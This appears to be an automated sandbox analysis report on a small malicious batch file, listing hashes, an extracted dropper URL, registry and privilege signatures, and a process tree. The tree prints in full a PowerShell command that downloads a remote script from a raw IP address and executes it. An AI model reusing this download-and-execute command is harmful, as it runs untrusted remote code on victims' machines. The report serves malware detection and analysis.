Analysis
max time kernel: 135s
max time network: 150s
platform: windows10_x64
resource: win10v191014
submitted: 11-02-2020 19:10
Static task: static1
Behavioral task: behavioral1
  Sample: hBjM939D.bat
  Resource: win7v191014 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: hBjM939D.bat
  Resource: win10v191014 (windows10_x64)
  0 signatures, 0 seconds
General
Target: hBjM939D.bat
Size: 198B
MD5: 31f14e4e5545659b2edf91aedb0830cb
SHA1: e5489bc5f3b8f118e6fb0ba7f5f4a0223a33863a
SHA256: 2f3a2162c69c2185edadd4cc4d60b0ef9f2d212d2d710f30e012b9878aefc0f1
SHA512: 80298267b14e688189cfefabed44496c5c22a51c50c788ac72ed1b9ad4ab1848068308f1a7990665ebba4220a428cdb7a1a5695a3643ea395af7566726914562
Score: 10/10
Malware Config
Extracted
  Language: ps1
  Source: URLs
  ps1.dropper: http://185.103.242.78/pastes/hBjM939D
Signatures

Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes:
  pid   process
  5112  WerFault.exe   (the same entry is listed 18 times)

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                                                 process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                    WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz               WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  WerFault.exe

Enumerates system info in registry (2 TTPs, 2 IoCs)
Processes:
  description        ioc                                                      process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS       WerFault.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU  WerFault.exe

Program crash (1 IoCs)
Processes:
  pid   process
  5112  WerFault.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                pid   process
  Token: SeRestorePrivilege  5112  WerFault.exe
  Token: SeBackupPrivilege   5112  WerFault.exe
  Token: SeDebugPrivilege    5112  WerFault.exe
Processes

C:\Windows\system32\cmd.exe (depth 1, PID 4936)
  command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hBjM939D.bat"

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 4980)
    command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/hBjM939D');Invoke-MHYLWDFAYARXBSG;Start-Sleep -s 10000"

    C:\Windows\SysWOW64\WerFault.exe (depth 3, PID 5112)
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4980 -s 704
      signatures:
        - Suspicious behavior: EnumeratesProcesses
        - Checks processor information in registry
        - Enumerates system info in registry
        - Program crash
        - Suspicious use of AdjustPrivilegeToken

\??\c:\windows\system32\taskhostw.exe (depth 1, PID 4184)
  command line: taskhostw.exe -RegisterDevice -SettingChange -Full